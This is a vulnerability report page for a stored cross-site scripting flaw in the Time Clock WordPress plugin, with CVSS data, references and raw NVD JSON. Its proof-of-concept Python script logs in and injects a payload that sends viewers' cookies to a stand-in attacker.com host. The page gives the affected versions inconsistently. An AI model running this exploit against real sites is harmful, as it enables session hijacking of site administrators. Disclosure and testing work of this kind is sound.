Security Vulnerability Report
CVE-2025-10701 CVSS 6.4 MEDIUM

CVE-2025-10701

Published: 2025-10-24 09:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Time Clock – A WordPress Employee & Volunteer Time Clock Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameter in all versions up to, and including, 1.3.1. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers with Time Clock user credentials to inject arbitrary web scripts in pages that will execute whenever a user accesses an affected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Time Clock WordPress plugin < 1.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-10701 PoC - Stored XSS in Time Clock WordPress Plugin
# Target: WordPress site with Time Clock plugin < 1.3.1

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "time_clock_user"
PASSWORD = "user_password"


def exploit_stored_xss():
    """
    This PoC demonstrates the stored XSS vulnerability in the 'data' parameter.
    The injected script will be stored and executed when other users view the page.
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/"
    }
    login_response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Inject malicious XSS payload via 'data' parameter
    # Payload: <script>alert(document.cookie)</script>
    xss_payload = '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>'
    time_clock_url = f"{TARGET_URL}/wp-admin/admin.php?page=time-clock"
    clock_data = {
        'action': 'clock_in',  # or clock_out depending on context
        'data': xss_payload,   # Vulnerable parameter
        'submit': 'Clock In'
    }
    inject_response = session.post(time_clock_url, data=clock_data)
    if inject_response.status_code == 200:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload: {xss_payload}")
        print("[+] Script will execute when admin views the time clock page")
        return True
    else:
        print("[-] Injection failed")
        return False


if __name__ == "__main__":
    exploit_stored_xss()

References

https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/actions.php#L387
https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/admin/activity.php#L149
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3382912%40time-clock&new=3382912%40time-clock&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/3710f219-545f-421d-a654-f49169ff7808?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10701", "sourceIdentifier": "[email protected]", "published": "2025-10-24T09:15:41.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Time Clock – A WordPress Employee & Volunteer Time Clock Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameter in all versions up to, and including, 1.3.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with Time Clock user credentials to inject arbitrary web scripts in pages that will execute whenever a user accesses an affected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/actions.php#L387", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/time-clock/tags/1.3/includes/admin/activity.php#L149", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3382912%40time-clock&new=3382912%40time-clock&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3710f219-545f-421d-a654-f49169ff7808?source=cve", "source": "[email protected]"}]}}